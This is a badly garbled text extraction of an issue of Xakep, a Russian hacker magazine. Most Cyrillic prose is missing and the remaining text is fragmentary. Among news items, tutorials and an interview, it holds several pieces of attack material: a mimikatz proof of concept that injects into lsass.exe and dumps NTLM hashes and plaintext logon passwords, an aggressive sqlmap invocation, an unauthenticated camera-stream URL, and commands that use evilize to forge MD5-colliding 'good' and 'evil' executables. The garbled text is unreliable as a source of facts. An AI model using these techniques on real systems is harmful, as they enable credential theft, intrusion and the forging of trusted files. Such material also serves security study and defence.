Вы находитесь на странице: 1из 148

ANDROID

111

WWW.XAKEP.RU

04 (159) 2012

DuckDuckGo:
Google
,

TRUECRYPT

: 230 .

024

:
,
,

084

SHIM ENGINE:


056



ASP .NET

018

Intro

nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)


PC_ZONE UNITS

UNIXOID SYN/ACK
MALWARE

PR-

step (step@real.xakep.ru)
(petya@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(vagizova@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)


PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906




-


.: (495) 935-7034, : (495) 545-0906

-
, , , ,
. - , , .
,
!
, .
:
, -,
.

- . , ,
-.
,
, .

,
, .
nikitozz,
. .



TECHNOLOGY

(zinaidach@glc.ru)
(filatova@glc.ru)
(olgaeml@glc.ru)
(melnikova@glc.ru)
(kachurin@glc.ru)
(polikarpova@glc.ru)

( )
(tatarenkova@glc.ru)

(gospodinova@glc.ru)
(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)

(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)

:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .

P.S. ,
,
, .
!

.
. ,
, . .
.

: content@glc.ru.
, , 2012

04/159/ 2012

001

Content

008

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017



Proof-of-concept
: Windows

COVERSTORY

024

COVERSTORY

018



1100
RECON SCOUT XT
:)

056

116

PCZONE
030
036

040


IT, ? !
!


Google .
10 DuckDuckGo.com

UNIXOID
102

106
111

044
050
056

060

064
068
072

Easy-Hack



ASP.NET:

ELMAH
Mail.Ru





- :
X-Tools

SYN/ACK
116
122

128

080

!
:


134
139

140
143

088
092
096
100

Shim:
Shim Engine

True-
TrueCrypt

,


WMI:



!

Edifier MP15 Plus

144

084


VDI Win2k8R2 Linux


Samba

IT- Microsoft: 2012

FERRUM

MALWARE
074


,


kobjects, sysfs, udev, udisks upower

Android-:
CyanogenMod vs MIUI

134

FAQ UNITED
FAQ

8.5
WWW2
web-

MEGANEWS

BITTORRENT -
BitTorrent, -
, .
, ,
,
BitTorrent. , , .
,
BitTorrent Live. ,
.

. BitTorrent Live 99%. ,
, CDN, . -
live.bittorrent.com, , BitTorrent Live
.
,
. ,
Netflix Hulu.





.
,
MPAA, RIAA

,
.

,

,
, ,
,
.




,
SSL-.
HTTPS
.

004

WINDOWS 8 ,

.

.


,

.

PASTEBIN
.
31
13
DNS-.

, Anonymous,


. ,


(pastebin.com/
NwN8ehFW)

,
Gmail-
.
Ars Technica
. , Xbox, PS3 iPad
. ,
() (, ,
Xbox Kinect),
.
( Xbox Live) . Ars Technica
, Microsoft , ,
-,
Xbox Live Skype.

ANDROID MARKET
.
Bouncer



.

FOXCONN
SWAGG SECURITY.
, ,
,
Apple
TPB.

04 /159/ 2012

01

02

03

READER@GLC.RU
.

04

MEGANEWS

vk.com.


TRENDNET
, IP-



!
GOOGLE
AUGMENTED REALITY
- ,
Google , ,
. ,
,

Wi-Fi Bluetooth. , Google, . ,

, Google . , ,
, , .
, ,
. , ,
Google - ,
Google Glasses.
New York Times,
.
: , , iPod nano.
, , Google
Heads-Up Display (HUD).
, . ,
.
, 9to5google.com ,

. ,
,
,
. , 9to5google.com :

.
HUD-. , ,
. , Android-,
NYT, .
Wi-Fi Bluetooth 4.0. ,
Google. ,
, ,
. ,
GPS , -, Android.
, ,
3D. , , ,
9to5google.com, .
. , , Android-. : , Google .

Trendnet , 2010

26
,

,

.

Trendnet
.
. 1.1.0 (build 104)
,
Trendnet
IP-: IP-
15 ,
. .
( ), /anony/mjpg.cgi,
. , :
http://192.168.1.3/anony/mjpg.cgi, ,
IP- 192.168.1.3.
, , Pastebin
1 000 IP-, Reddit.
IP-
shodanhq.com, .
[netcam].

GROUP-IB



2011

HOSTING MEDIA.
006

04 /159/ 2012

MEGANEWS

20 ( ) Google Chrome 17.0.963.46.

SYMANTEC ,

ANDROID-

. Recon Robotics, .
, 31
1 100
Recon Scout XT. 13.9
. ,
Recon Scout XT
.
,

,
Recon Robotics. , 315
, .
-? Recon
Scout XT
,
.
36 .
Recon Scout XT .

(youtu.be/5fzi7fxknIc)!
, Recon Scout XT , .

Symantec
RootSmart,

.
Android Market , ,
. RootSmart
,
IMEI, IMSI, ID , locationarea code
.
RootSmart Ginger Master,
Gingerbreak. , , RootSmart
root-, Gingerbreak . Root-
shells.zip
.

Droid Live,

.
, , , .
,
1 600 9 000 .

110-140 .



C&C-. ,

2011 .

WEXLER.BOOK T7007
ANDROID 2.3

WEXLER.BOOK T7007, Android 2.3. : 7"
LED- Multi-Touch,
ARM9, c 1,2
Wi-Fi (IEEE 802.11
b/g/n) 150 M/.
3700 .

008

8 ,
32
MicroSD. WEXLER.BOOK T7007
G-, USB- (USB OTG).
.

4999 .

04 /159/ 2012

MEGANEWS

BUG BOUNTY: Google 410 . .



( ,
)

Virtual Human Interaction Lab (vhil.stanford.edu).
,
, . , ,
, .
Knowledge Stream (knowledgestream.ru).
, . , ,
,
.
HD- .


. 20-
,
,
,
.
:
,
, Skype,
.
, ,
, .
, , , . ,
, ,
, ,
, 90%.

, .
. , ,
, , ,

(
) , ,
,
.
, Knowledge
Stream
. ,
- Electronic
Frontier Foundation, ,
. ,
.

Knowledge Stream
2011

Digital October. Knowledge
Stream
,
.

!

-
.

.

- !

010

,
! ,
!

2011
,
: 4 ,
0,4 , CO 5 .

04 /159/ 2012

#hacker tweets
@n00bznet:

./sqlmap.py -u http://url/ --crawl=5


--level=5 --risk=3 --threads=10 <~
,
!
:

, sqlmap
SQLi-.

@ChrisJohnRiley:



:)

@FirefoxNightly:

ASLR
dll- ( )
-ASLR
http://t.co/IQFdZrZ4
:

Firefox, ...

@pa_kt:

CVE-2011-2371
(Firefox reduceRight) -ASLR :
http://t.co/3uNU3Jjj

@RomiSphinX:

: ,
, -
. ()
<3
:

(.
Richard Phillips Feynman; 11 1918 15
1988) .
.
. 19431945
.

:
:

, ,
,
...

@corelanc0d3r:


, , :)

... !

Firefox DEP ASLR.
ASLR ROP
-ASLR ,
dll
ROP- dll.

@mathias:

JavaScript: try { x; }
catch( _
_ ) { console.
log('CODE, Y U NO WORK '); }
http://t.co/RTJaNUij
:

@FreedomCoder:

.
...

-
JavaScript.
,
:)

@geovedi:

,
- ,
.

@clarkysj:

, 5 , 18 -
6 - ,
.
, .

@thealuc:

,
-: >(tee
-a ~/.bash_history | logger -t $USER[$$]
$SSH_CONNECTION)

04 /159/ 2012

@daveaitel:
@joshcorman:

: White
Paper
-
---.

@f1nux:

, ...
, SSL.
. ...
:

, SSL ,
. ,
,
.

WP ftw!
SYSTEM
( )
?
! Symantec pcAnywhere
12.5 .

@i0n1c:

80
, , ,

- .

@evacide:

011

MICROSOFT STORE EVIL SHADOW TEAM. , .

MEGANEWS

ANONYMOUS

QR-



Sonic
Experiences,
,

iPhone
Android.


QR-, . , , .
, , ,
- , ,
. Sonic Notify (sonicnotify.com), , ,
QR-. .
, iOS Android
. , Sonic Notify
. ,
, .
, ,
, ,

. , , , . ,
- ,
:).



220 000

.

012

15 YOTA LTE,

2500-2530 2620-2650
. WiMAX LTE
14 15
.



:


.


Anonymous, , ,
.
. ,
-
-. --, -
!
Anonymous ,
. YouTube,
: youtu.be/pl3spwzUZfQ.

- ,
(pastebin.com/8G4jLha8).
, .
- , .
,
.


MEGAUPLOAD, 19 ,

2-3%,
DeepField Networks.

DDOS-

NASDAQ,
BATS
LONGwave99.
99%.

04 /159/ 2012

MAC OS X 10.8 Mountain Lion ( ) 2012 .

RAPIDSHARE

GOOGLEWALLET

PIN

egaUpload , ,
RapidShare .
RIAA MPAA,
.
- , TorrentFreak
.
:
RapidShare
, .
anti-abuse department.
, , , RapidShare.
,
. ,
. , , .
2010 , Dutko,
RapidShare. Dutko
RapidShare.
. , ,
.

Google Wallet
2011 .
Android-, NFC.
.
Google Wallet

. , .
,
.
.

. Google , Google
Wallet , , Secure Element,
. , Google Wallet
.
, , ,
, .
, PIN-
, Google!
.
, zveloLABS,
sqlite3, Google Wallet . metadata. ,
.
gmad_bytes_are_fun

.
, , .
deviceInfo,
, .
Protocol Buffers. .
,
messageformat .proto (Protocol BufferBasics: Java).
.proto,
. Unique
User IDs (UUID), Google (GAIA)
Cloud to DeviceMessaging (C2DM, -),
Google Wallet Setup, TSA (,
Trusted Services), SE,
CardProduction Lifecycle (CPLC) PIN-!
PIN-
SHA256. PIN- ( ),
10 000 SHA256,
. PIN-
,
,
Google Wallet .
zveloLABS , Google
. ,
, :
youtu.be/P655GXnE_ic.

RapidShare
:



Dropbox',

,

.

VLC
2.0 TWOFLOWER.
:


BLU-RAY .
04 /159/ 2012

013

MEGANEWS

GOOGLE CHROME BETA ANDROID 4- . , flash.

SSL

TWITTER
BLOGGER

Google

SSL-

Chrome.

,
.

, Twitter ,
,
. Twitter.
, , ,
. ,
Twitter ,
. ,
. ,
, Anonymous. Twitter .
, ( )
, ,
.

. -
.
Google
, , Blogger,
. , Google
.

SSL .
Trustwave
.
Bugzilla, mozilla.dev.security.policy.

, .
,
, man-in-the-middle
SSL/TLS.
Mozilla ,
Firefox
Mozilla,
HSM.
27 . , Mozilla
.

WOLFRAM ALPHA
,

,
. Wolfram Alpha
Pro. Pro-
4,99$
(2,99$ ),


14 .

014

OCCASSIONAL
GAMER,

Windows Phone 7 (55%) HTC.
Samsung (28%), LG (12%)
Nokia (4%).

INTEL Core i5-2380P, i52450P i5-2550K Sandy Bridge.



GPU.

04 /159/ 2012


THE PIRATE BAY


, ,
.

, . .

, .

2008 .
, , ( , ).
, The Pirate Bay .
, 2010 ,
4, 8 10 , 46 (
6,8 ). , ,
, .
,
( ,
) TPB , . ,
. ThePirateBay.org
, ,
( ,
,
), .
, .SE, .
, .
TPB
magnet- torrent-.
, torrent- (,
, - , ), . ,
.
torrentfreak.com :
, 164
, 90 ! , . , ,
- .
, The Promo Bay.
(, ,
) ,
The Pirate Bay. ,
SOPA ,
, P2P. , ,
, , .
.

04 /159/ 2012

015

HEADER


, .
.
. ,
(
), .
. ,
,
, , . :
-

- ? ,
- :
-
Ubuntu

.
Vagrant
(vagrantup.com).


Oracle's
VirtualBox (4.0.x 4.1.x), Vagrant

.
,
. downloads.
vagrantup.com
( Windows, Linux, Mac OS X)
(
):
$ vagrant box add lucid32 http://files.
vagrantup.com/lucid32.box
$ vagrant init lucid32
$ vagrant up


(,
, VirtualBox)! ,

016

box add < >


.

box- ,
.
, : Vagrant
.
init ,

: 32-
Ubuntu Lucid (10.04).
512 .
vagrant up
.
.
Vagrant. :

Vagrant

vagrant suspend

,
:
vagrant status

SSH, Vagrant:

vagrantbox.es

vagrant ssh

,
.
(,
IP),
Vagrantfile, Ruby.
, ,
. , ,
box-, .

Ruby

04 /159/ 2012

Proof-of-Concept

WINDOWS
,
.
? !
?

,
Windows-. Windows Credentials Editor
. mimikatz
(blog.gentilkiwi.com/mimikatz). ,
... .
, , . , ,
.
,
(
). :

mimikatz. ,
: ,
:

mimikatz # privilege::debug
mimikatz # inject::process lsass.exe sekurlsa.dll
mimikatz # @getLogonPasswords

mimikatz 1.0 x86 (pre-alpha)

/* Traitement du Kiwi */

mimikatz # privilege::debug
Demande d'ACTIVATION du privilge : SeDebugPrivilege : OK
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 488
Attente de connexion du client...
Serveur connect un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donnes de scurits dans LSASS
mimikatz # @getLogonPasswords
Authentification Id
: 0;434898
Package d'authentification : NTLM
Utilisateur principal
: Gentil User
Domaine d'authentification : vm-w7-ult
msv1_0 :
lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest :
password
tspkg :
password

mimikatz

04 /159/ 2012

: , ?
, . wdigest (technet.microsoft.com/
en-us/library/cc778868(WS.10).aspx),
, , HTTP Digest Authentication
, ( ). ,
WCE. z

017

COVERSTORY

Sanjar Satsura (sanjar@xakep.ru, twitter.com/sanjar_satsura)

IT-


.
Stuxnet, ,


. .

018

04 /159/ 2012

DVD

WARNING

,
,


.


. ,



,

.

04 /159/ 2012

019

COVERSTORY


? , . , ,
, .
kernel.org: ,
, .
,
-, MD4, MD5 SHA-1.

( ). -. , , - ,
!

- ,
(). -
, - ,
. ? , .

, - F
x y , F(x) = F(y).
- F(x) = x|19|, . ( ,
) 19 ( 19),
. ,
. ?
-, 38, -
. F(x)
19, y y+19

-,


(/)

Davies-Meyer (c IDEA)

128

22

Davies-Meyer (c DES)

64

256

11

HAVAL (3 )

168

HAVAL (4 )

118

HAVAL (5 )

95

MD2

128

23

MD4

128

236

MD5

128

174

N- (12 )

128

29

N- (15 )

128

24

RIPE-MD

128

182

SHA

160

75

Snerfu (4 )

128

48

Snerfu (8 )

128

23

-,

020

-, y. , 38
- 57, 76 .
, (38,57), (38,76)
- F(x).
- F ,
,
- .
1. : - m
x,
F(x)=m.
2. :
m n, F(n) = F(m).
3. : , .

(,
, ).
- CRC, -,
.
, -,
.

. ( 32 ) ,
( : 128, 160 256 ),
.
C, CRC- 100 000 :
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define INTERATION 100000
int main(){
int count =0;
int i,j;
unsigned hash;
char c;
unsigned* table;
table = calloc(INTERATION,sizeof(unsigned));
for(i = 0; i< INTERATION; i++){
hash = 0;
for(j=0; 32 > j;j++){
c = 33 + (char) (63.0*rand()/(RAND_MAX+1.0));
hash = (hash * 33) + c;
}
hash = hash + (hash >> 5);
for(j=0; i > j ;j++) if (table[j] == hash) count++;
table[i]=hash;
}
free(table);
printf("%d values %d collisions\n",INTERATION, count);
return 0;
}

- , -
. ,

04 /159/ 2012

IV , L1 L2 . ,
A

C
D

=
=
=
=

0x12AC2375
0x3B341042
0x5F62B97C
0x4BA763ED


AA1DDABE
1006363E
98A1FB19
1326ED65

D97ABFF5
7218209D
1FAE44B0
D93E0972

BBF0E1C1
E01C136D
236BB992
D458C868

32774244
9DA64D0E
6B7A779B
6B72746A

2^9 32-
,
. ,
( ).

VeriSign

: MD4 MD5.
MD5 ,
MD4.
.
,
.
, F .
G = XZ v (Y not(Z)) ( XY v XZ v YZ). , -
.
2 3. ( :
ASCII 5 0x3516 = 0001101012
4 0x3416 = 0001101002)
. .
128- (16-) MD5-:
MD5("md5") = 1bc29b36f623ba82aaf6724fd3b16718

, MD5,
(F)
. , , ,
, . C
: MD5(IV,L1) = MD5(IV,L2),


,
. ,
/ -. , , ,
,
.
MD4/5, .
1. :
, ,
.
2. :
,
.
3. RainbowCrack:
;
,
, .
, , : PasswordsPro,
MD5BFCPF, John the Ripper.
WWW

STUXNET
, Stuxnet,
- ,

? -
,

JMicron Realtek. ,
.
Stuxnet
Duqu. C-Media Electronics, .
, ! ,
, .

. , ,
,

04 /159/ 2012

:). ,
, . -,
,
(
orr,
-, -:
woodman openrce),
. Duqu,
(c )
. -,
( , Duqu) ,
, ,
15 ! , ,
.
,
-.

MD5:
bit.ly/awBxKK;


():
bit.ly/byRrQu;
MD5 Collision
Generator:
bit.ly/zLR5Ec;
Evilize:
bit.ly/zEBLmj;
Rainbow MD5 Crack
by Collision Search:
bit.ly/yYRUxl;

MD5:
bit.ly/yDQNuY;
HashClash Framework:
bit.ly/722ob;


:
bit.ly/ztdpHg.

021

COVERSTORY


, .

,
.
1. CR2-KK , .
2. CR1-KK .
3. CR0 .

:
1. CR2-KK .
2. CR1-KK ,
.
3. 0 .

. HEX (
-
), hex-
:
1-

hello-erase.c, .
,
goodevil.o:
gcc hello-erase.c goodevil.o -o hello-erase

d131dd02c5e6eec4693d9a0698aff95c2fcab58712467eab4004583eb8fb7f89
55ad340609f4b30283e488832571415a085125e8f7cdc99fd91dbdf280373c5b
d8823e3156348f5bae6dacd436c919c6dd53e2b487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080a80d1ec69821bcb6a8839396f9652b6ff72a70

2-
d131dd02c5e6eec4693d9a0698aff95c2fcab50712467eab4004583eb8fb7f89
55ad340609f4b30283e4888325f1415a085125e8f7cdc99fd91dbd7280373c5b
d8823e3156348f5bae6dacd436c919c6dd53e23487da03fd02396306d248cda0
e99f33420f577ee8ce54b67080280d1ec69821bcb6a8839396f965ab6ff72a70

MD5 , !
. MD5
Collision Generator
CR2-KK. .
15 ,
! , .
, - evilize (
). : evilize, md5coll
goodevil.o. -

:
md5sum ./hello-erase
23d3e4873e3ea619c7bdd6fa2d0271e7
/home/satsura/md5coll/source/evilize/hello-erase

, MD5-:
./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > \
init.txt

evilize MD5-.
,
:
./evilize hello-erase -c init.txt -g good -e evil
du -sh ./evil ./good & md5sum ./evil ./good
8,0K
./evil
8,0K
./good
d8bf211b61624d331fe06c75bd6e3c89 ./evil
d8bf211b61624d331fe06c75bd6e3c89 ./good


MD5,
, .

1996

022


(Wang Xiaoyun), (Feng Dengguo),
(Lai Xuejia) (Yu Hongbo)
,
(1 IBM p690).

2004


,
128 ,
MD5-.

2005

04 /159/ 2012

./good
Hello, world!
./ evil
This program is evil!!!
Erasing hard drive...1Gb...2Gb... just kidding!
Nothing was erased.

, Hello, world!,
. hello-erase.c ,
,
.
, CR1-KK.

CR1-KK

Unicon, (- ) . ,
CR1-KK-collision keygen ,


- .
, . , : 000000.

.
,
, CRM- ( , E-hujjat
).
, :
C:\coll_test> md5sum *
b2d1a3f63f9784e0fe8c237ff2484a78
key
a654bd700b5e6cf47ca0b042b2f30575
c5d6aaa28639316614e3d95987fcb612
a654bd700b5e6cf47ca0b042b2f30575

*key((faked by collision).
*cer(faked by collision).cer
*pfx(faked by collision).pfx
*cer.cer

, cer.cer cer(faked by collision).cer


.

, MD5- . . ,
-. , ,
. :
, .
, 128-
.
, MD2, MD4, MD5, DES, DES-IDEA, RIPEMD, HAVAL(~128, ~256), SHA-1, 34.10-2001 .
. z


,


(A,B,C,D) ,
.

2006

04 /159/ 2012




, MD5-.

2007


evilize

(Authenticode digital signature), authenticode
Microsoft
.

2009

023

COVER STORY
.

.
Wi-Fi
VPN Windows.
,
Almaz Capital Partners,
, .


.

. .
, .

, ,
.
.
. ,
, ,
, .
.
, , , .
,
. , :
.
, ,

. , ,
. 1972 !
, , ,
.
, ,
: . .
:

... , ,
,
,
, .

. ,
, , ,

024

.
... .
.
, ,
.

:
. ,
:
, , ,
,

.
, . , , .
,
,
. ,
.
,
,
.
, , , :
, ,

. , 10%
,
.
: , .
, :
, , ,
... ,
. ,

, . - -

, .
, -.

SUN
Sun
Microsystems 1990 .
, . ,

,
, .

,
.
,

. -
. -
,
. - .
22- ,
.
- 8 ,
, 22 !
,

.
: ,
. ,
,
.
, Sun
, SPARC-
.
, Sun . 1990
,
.
, -...
,
Sun . ,
SPARC ?
SPARC , ! Intel
, SPARC .
, : , .
, , .
: ? :).
1991 ,
-
.
. ,
,
, ,

04 /159/ 2012



30

Almaz

s, er
rtn
Pa
al
pit
,
Ca

war, Alter Geo
Ala
ls,
Paralle

04 /159/ 2012

025

COVER STORY
, . :).
-
, .
Sun
. IBM, HP...
: , ,
. , Sun,
.
, - ,
... : ,
,
! - IBM HP. .
Sun 15
, 25
000 . ?
. .


,
. :
,
.
... .
.

WI-FI
80- IP . Unix- ,
IP-
. ,
PDP DEC, , ,
.

,
.
. .
Sun. : 802.11,
,
PCMCIA-?. ,
...
802.11 , , . Internet Engineering
Task Force. , , -
. Wi-Fi ,
. , .
Motorola, ,
. : Sun
. , - ,
.
. Sun ,
.
-.

026

1993 PCMCIA- Wi-Fi, 4 /c. Interop .


Wi-Fi
! , . Sun
,
Ericsson,

. Ericsson HP LX
, .
. , ,
--, . 19.2
/ .

. :
? .
!, CEO Ericsson,
2003-2004 .
Sun
. -
, .
Solaris ,
. ,
,
. ,
, , .


90- ,
,
, - ,
, . ,
. .
VPN,
, .
,
+, (
) .
Sun,
.
. ,
- Microsoft
- 90- .
.
: , -
-....
, ,
.
: - , ,
.
,
, .

. - , :
, .


,
(, ,
- ). ,
, ,
. ,

,
,
. .
.
, - , . ,
, VPN,
,
. , Sun Windows
: , , Windows!.
NDIS-,
Microsoft . ,
, , VPN.
Sun Screen E+
.



. ,
- , - ,
.
, .
.
,
, ,
,
- .
,
... ,

20 30 .
,
, , , ,
, 40-50
:). , ,
, . 1000%,
Google - ,
5-, 10- .


( repeated entrepreneurs),

, . ,

04 /159/ 2012

,
, , ,
.
,
,
.
Almaz 2
- ,
.
, - . -
,

. .
,

.
,
. ,
. . ,
.

... ,
.
, ,
...
, .

?
,
. , .
, - , .
. , ,
,
. ,
, ... .
, ,
. ,
.


WI-FI
,


.
. , e-commerce,

. - ,
( ,
) , .

e-commerce ,
- .
.
,
, .

, -
.
:
, . : ,
.
(
, ),

04 /159/ 2012

, , ,
. : , , ,
, , .
-.
. - . , , -
-,
, .

, ,
. , : ,
: ,


.
, , .
, -

, .
- ,
: - , , ,
,
. : ,
, ,
- .
, ,
.
, .
Google... , , Microsoft IBM.
,
: Apple, Google, Facebook
Amazon. , Microsoft.
,
.
, , ,
, .
, . ,
. , ,
,
.
:
. ,
. -
,
.
CEO, ( , )
.
. .
. ,
, ,
.
: , ? ,
, ?
-
, - .
?
?.
: , .

HR ,
, ,
. .
, ,
, ( ),
, ,
.



, ,

.
.

027

COVER STORY
. ,
.
.
.
.
.
Google. 2009 2010 ,
42 .
400 .
... ,
25 . , -
, - . . 10-30. 2-3
. ,
25
3, 8-10 . 10 ,
,
30% .
300 3 ,
. 300 ,
, . , . , .
.
, .
go global,
( Parallels, ,
) . ,
, , -,
,
,
, . -,
.
,
. , ,
. ,
: , -
- , - .
. .
,
(Famatech
RAdmin, ,
),


. , , ,
,
. .
IT- ,
. .
,
1 10
.
.
.
, , , ,
. , ,
JetBrains ,
. , ,
40-60
, . ,
.
,
.

,
. ,
.
, ...
, .
? , , , -
.
... .
, ,
.
-.
,
.
, ,
.

. , . ,
, .
OpenFlow,



CRAZY

,

.

028



.
!


,

20-30% ,
.

SoftwareDefined Networking.

.
, .
,
.
,
,
.
.

. , ,
.
, . ,
. ,
,
,
,
.
, : .
, ,
, (
),
.
.

. ,
, :
,
-. , . ,
. ,
,
,

. , ,
! , , ,
,
.
,
, .
,
. -
,
, : ,
, , .
.

, , .
- ,
, - ,
. , ,
.
. , ,
,
. , .

. z

04 /159/ 2012

Preview

30 .
.

PCZONE
30


.
,

,

.

,


.
-,
,
.

PC ZONE

36

!

WIndows- Linux
? ,
WinSwitch.

60

MAIL.RU

. ,
,
.

04 /159/ 2012

40

GOOGLE ,
Google .

DuckDuckGo,
.

56


ASP.
NET ,
web-,
. .

MALWARE

74



.
.

80



,
.

029

PC ZONE


IT,
? !

. .
IT,
.
, ,
-.
,
, .
IT .
030

,

.
.

. , , ,
, .
, .
, .

04 /159/ 2012


,
.
, ,
,
, .
, : -
IT-
,

. .

. .
.
, ,
:).

,

. ,
,
, .

, ,
.

LINGUALEO

TED.com),
(
) .
,
. ,
. ,

. ?
, LinguaLeo

,
.
,

.
, -,
, -,
. ,
,
.

, , -
. , ,
.
, ,

,
.


(, iTunes),
.

, .

(ai-class.com),
(db-class.org).
, .

PDF-,
. ,
, :
(securityclass.org);

(security-class.org);
(cs101-class.org);
(cs101-class.org);

(cs101-class.org);
,

( ).
.
,
, , ,
. ,

, - . , ,

.

,
6.002x:
.
. ,
,
, . -

,
Scheme
Structure and Interpretation of
Computer Programs. . ,
, .

: ,
. . :

, -,
. - ,
, ...
,
LinguaLeo.ru, .
,
,
(, -

, , .

, ,
.
,
.
,
,
-.
:
(ml-class.org), -

MITX

MIT .
MITx
-. -

04 /159/ 2012

031

PC ZONE

JavaScript
,
,
.
: ,
. -

: Python, Ruby ( Ruby on Rails)


, , JavaScript (HTML5). .
-

JS,

.
JavaScript :
,

Linux (bellard.org/jslinux).
:).

CODECADEMY

.

, , ,
,
.
,
- .
, , JavaScript.
,
.

.

Codecademy.
UGC (User-generated content)

.

www.codecademy.com
:
? .
.
, .
, 21 ,
.
Codecademy ,
.

( !) ,
JavaScript.

JQUERY

learnjquery.tutsplus.com
JavaScript
jQuery,
HTML-, ,
AJAX.
jQuery
JavaScript. .
,

JQUERY
codeschool.com/courses/jquery-air-first-fligh
,
, -
c<>de school.
,
,
. jQuery
Air: First Flight ,
.
, -

032

Nettuts+, ,
.
-
, .
,
. :
,

. ,
JS,
(bit.ly/AqK4s0).


, .
(, 350 ). -
, , .
JavaScript, ,
CSS-,
HTML- DOM,
.
,
.

04 /159/ 2012

Ruby Ruby on Rails



, ,
,
Ruby on Rails.
,
-,

. ,
.
,
, Ruby Ruby on Rails
.
.

RUBYMONK

.

( , , ,

).
, . ,
,
, ,
.

rubymonk.com

, ,

Ruby. :
. .
- ,
.
,

TRY RUBY
tryruby.org
- ,

Ruby
, . ,

THE INTRO TO RAILS SCREENCAST I


WISH I HAD
bit.ly/zqLVPH
, Ruby
- Ruby On
Rails.
,
Twitter.
tutsplus.com

RAILS FOR ZOMBIES


railsforzombies.org
( !)
Rails
-,
c<>de school.

04 /159/ 2012

, ,
. Ruby
:
,
Metasploit ( ) Ruby.

, try ruby . ,
, ,
.

. ,

c<>de school. .


Rails, . 40-
, Rails.
Models, TDD, ActiveRecord,
RSpec, Capybara, Partials
.
:

railscasts.com.

,
, ,
,

.
, Rails
for Zombies 2,
.

033

PC ZONE

Python
Python

.
.
Python

PYTHON!
trypython.org
- Python.
JS Ruby, ,
,
.

- PYTHON
onlinepythontutor.com


.
, ,
Python,
(-) -

PYTHON GOOGLE
code.google.com/edu/languages/googlepython-class/index.html
Google , Python.
,
, (,


. ,
:
, Python,
.
:

, -
,
.
, Python
,
.

.
:
.
: Try
Python ,

. ( Python
IronPython). ,
Silverlight.


(, ,
). ,
, ,
Python MIT.
, ,
. .
-,

-

, I/O- . ,
.

).
.
, ,

.
Python (
),
, ,
HTTP-. ,

Google
.

!
,
,
, .
,
,
, ,

034

,

NoSQL
.
Haskell: tryhaskell.org;
Scala: simplyscala.com;

Erlang: tryerlang.org;
Clojure: try-clojure.org;
MongoDb: try.mongodb.org;
RedisDb: try.redis-db.com;
C#: bit.ly/A4HR9m;
SQL: sql-ex.ru.

04 /159/ 2012

PC ZONE

Ant (zhukov.a@real.xakep.ru)

!
- .
.
-

. WinSwitch
.

WINSWITCH?
,
, , ( ). ,
Ubuntu,
Windows Ubuntu.
, ,
. - , ,

. RDP VNC
, ,
.
,
?
? ,
. WinSwitch!
? - ,
, .
, , . ,
Microsoft Word , ,
Visual Studio ,
. ,

036

, .
: Windows
Ubuntu,
(
). Visual Studio.
, .

, , , WinSwitch . , Ubuntu Natty Narwhal


(11.04) Windows XP.
Windows. :
winswitch.org , .
mDNS-
( mDNS )
( , , ),
.
Linux. , ,
Ubuntu, , ,
. ,
:
sudo su wget -O https://winswitch.org/gpg.asc | apt-key add -

04 /159/ 2012

WinSwtich

ant-vb

echo "deb http://winswitch.org/ natty main" > /etc/apt/


sources.list.d/winswitch.list
apt-get update
apt-get install winswitch

. , , listen_on, ,
. , ,
,
listen_on="*:32123" ( ,
32123
).
allow_root_logins,
False. ,
/ . allow_root_authentication
, . . mDNS
settings / mDNS,

,
,
.

WinSwitch : ( ). ,

. ,
.

mDNS.
,
.
,
. ,
. *nix ~/.winswitch/server/server.
conf, Windows *\Application Data\Window-Switch\server\server.
conf. . , ,
:
# Identity
ID="8796747538515"
name="testpc"
type="workstation"

. ,

04 /159/ 2012

WinSwitch

037

PC ZONE

Ubuntu VNC

, ""

,
.
mDNS_publish False,

.
, , ,
mDNS_publish_username. , , - .

,
.

-
- .
. Windows XP.
Window-Switch. ,
. . Ubuntu.
Internet WindowSwitch.
, . , , testpc ID=8796747538515.
, ,
user.

, , ant-vb
ant .

. , WinSwitch
Start Application Games Mines. ( ), .
, Mines Send to user on testpc.
. ,
. !
, WinSwitch , ,
. ,
Start Application Custom Command.
,
,
Open in Window Switch. ,
(Main Unix Display
VNC Copy).
( GStreamer).

,
. ,
, . , , , .

MDNS?
Multicast DNS (mDNS)

DNS ,
DNS-.
, mDNS
IP-
DNS. ,
, mDNS.
,

038

.

mDNS-
/.
(,
)
response- TTL = 0. mDNS
.local.
mDNS
Bonjour (Apple)
Avahi (Linux).

04 /159/ 2012

Avahi-

, Windows-

Windows- - Ubuntu

, .
. .
: *\Application Data\Window-Switch\
client\applet.log. ,
- . , .
, . , : ,
--debug-mode. ,
(C:\Program Files\WinSwitch) :
Switch-Server.exe --debug-mode

,
. , ,
Linux-. . :
winswitch_server --debug-mode

:
[EE] 2012/23/02 19:13:18 WinSwitchServer.check() running
as root (uid=0) is currently broken

.
, (
). ,
.
.
, [DD] ( ). ,
. , - ,
traceback. ,
:
AvahiPublisher.__init__(Window Switch for ant on
ant-vb,32123,_shifter._tcp.,,,['username=ant', 'ssh_
tunnel=False', 'version=0.12.11', 'ID=8796747971533'],-1)

04 /159/ 2012

. Avahi , .
,
, , .
Mac OS X (Rendezvous, Bonjour)
. Avahi mDNS flexmdns.
mDNS, mDNS ,
. , Avahi .
, , :
avahi-daemon

